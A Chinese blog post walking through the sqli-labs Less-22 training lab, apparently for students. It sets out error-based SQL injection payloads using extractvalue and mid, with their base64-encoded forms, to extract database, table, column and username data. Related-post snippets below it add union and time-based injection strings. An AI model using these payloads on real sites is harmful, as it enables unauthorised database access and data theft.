【网络安全】sqli-labs Less-22 解题详析

原创 已于 2025-04-10 22:11:41 修改 · 3.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #数据库 #sqlilabs

于 2023-08-03 07:59:43 首次发布
本文解析了SQLi-Labs Less-22的解题过程,通过报错注入、使用extractvalue和mid函数获取数据库信息,包括库名、表名、列名及数据。详细介绍了如何利用特定姿势获取敏感信息,并涉及base64加密的处理方式。

该题注入手法与Less-21相似,区别在于该题注入类型为双引号注入

原理参考所给链接,本文不再详述: 【网络安全】sqli-labs Less-21 解题详析

查库名

查库名

Dumb" and extractvalue(1,concat(0x23,database()))#

这里构造"的原因可通过页面回显得出,不再赘述。

经过加密得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLGRhdGFiYXNlKCkpKSM=

在这里插入图片描述

可知库名为security

查表名

Dumb" and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#

加密后得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWEgPSBkYXRhYmFzZSgpKSkpIw==

在这里插入图片描述

得到四个表名

查列名

Dumb" and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

加密后得到

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYSA9IGRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWUgPSAndXNlcnMnKSkpIw==

得到三个列:

在这里插入图片描述

查数据

该姿势使用到mid函数,参考文章: mid函数原理、应用及实战讲解

以获取username列的数据为例,利用mid函数构造POC:

Dumb" and extractvalue(1,concat(0x23,mid((select group_concat(username) from users),1,32)))#

加密后得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLG1pZCgoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksMSwzMikpKSM=

结果如图:

在这里插入图片描述

接着,我们提取从第 32 个字符开始的长度为 32 的子字符串:

POC如下:

Dumb" and extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32)))#

加密后得到:

RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDIzLG1pZCgoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSBzZWN1cml0eS51c2VycyksMzIsMzIpKSkj

结果如图:

在这里插入图片描述

sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 8194
sqli-labs,sql注入,burpsuit
sql-labs 5-22关(基础关)
qq_53859960的博客
08-08 239
查看源码, 发现如果sql语句正确,查到数据,会显示“You are in…”,如果错误,显示报错信息,这就给了报错注入,回显带着数据库有用的报错信息利用。构造解释:取出数据库的第一个字符串,并且将其转化成ascii,在进行比较,判断第一个字符,重复八次,数据库名为security。原因是union前后的查询的列数不一致,因此改为and 进行报错,但是前面的判断需要为真,不然后面的不执行。对查询到的第一个表名,取第一位字符,并且进行ascii转换,比较判断数据第一个字符的大小。
sqli-labs————less 22
Fly_鹏程万里
05-12 486
Less 22简单测试:username:adminpassword:aaa查看一下源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...
SQLi LABS Less-22
wangyuxiang946的博客
08-14 1万+
sqlilabs22SQLi-LABS第二十一关
sqli-lab-less22
Sa1nZen的博客
08-14 132
sqli-lab-less22
sqli-labs-less-22 图文笔记
yzcn
12-03 486
Less-22 正常登陆: 查看一下cookie: 利用解密工具破解,value为admin,因此该关卡与less-21类似,我们知道加密解密方式后开始判断注入点: 更改cookie为admin”,返回错误: 更改为admin”#,返回正常,说明闭合方式为””,现在可以开始注入。 获取当前数据库: " union select 1,2,database()#加密后得到: IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj 获取security库中的表: " union
sqli-labs/Less-22
m0_71299382的博客
11-19 260
sqli-labs第二十二关
精选资源
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
该资源包来源于GitHub上的一个开源项目,由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip,用户可以搭建一个模拟的SQL注入环境,从而在不危害真实系统的前提下,进行各种SQL注入攻击和防御的练习...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
01-18
Sqli-labs是一个在线的SQL注入练习平台,提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上,用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识,以便更好地应对现实世界中的网络攻击。
sqli-labs-master 靶场环境
最新发布
08-30
sqli-labs-master 靶场环境
精选资源
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
在信息技术安全领域,SQL注入是常见的攻击手段,攻击者通过在Web应用的输入字段中插入恶意SQL语句,试图破坏...phpStudy和Sqli-labs-maste的结合使用,为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。
sqli-labs攻关3(Less-11~Less-22)
qwzf
11-14 393
前言 好久没打sqli-labs了,闲来无事继续打一下。 一、联合查询-POST注入 1、联合查询POST单引号注入 1.注入点判断 uname=admin\&passwd=&submit=Submit 通过添加反斜杠\,得知是'闭合 2.显示位判断 uname=不存在的用户' union select 1,2 #&passwd=&submit=Submit ...
sqli-labs通关攻略教程四(less 18~less-22
m0_55854679的博客
07-11 455
sqli-labs通关攻略教程二(less 1~less-17) less 18 与第一关相同的步骤。首先在phpstudy中打开网站根目录,在第一关的index.php的文件中加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。 输入正确的用户名和密码,发现页面回显了IP地址,构造的sql语句和浏览器的使用版本一些信息.。若密码输入错误,则无浏览器版本的回显信息。 **注意:**如果你的密码输入admin
Sqli-lab教程-史上最全解(1-22通关)
热门推荐
qq_52364123的博客
04-10 1万+
sql注入集合
sqli-labs22
weixin_30339457的博客
05-27 224
接下里我们进入第二二关 好像和第21关一样 cookie的base64加密注入 闭合变成了双引号而已 0X01 构造语句进行尝试 " union select 1,2,3# IiB1bmlvbiBzZWxlY3QgMSwyLDMj 嘿嘿 好像成功了 那语句就不多说了 老规矩 一套组合拳打到低 切记 学习之路 少就是多 转载于:https:...
sql-lab靶场原理解(1-22关)
cz020907020808的博客
06-01 1511
id=1 'and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) – qwe 延时,说明数据库的第一个的第一位是e。id=1 'and if ((ascii(substr(database(),1,1))=115),sleep(5),1) --qwe 延时,说明数据库第一位是s。
SqliLabs Less21-22
qq_45785324的博客
07-15 607
SqliLabs Less21 Less22
sqli-labs基础篇 第18~22
Lucky小小吴的小屋
01-23 2741
sqli-labs基础篇 第18~22关,主要学习内容:burp抓包、数据包修改
[网络安全]sqli-labs Less-1 解题
12-25
SQLi-Labs网络安全领域的一个练习平台,Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中,你需要利用SQL注入技巧来获取数据库中的敏感信息,通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值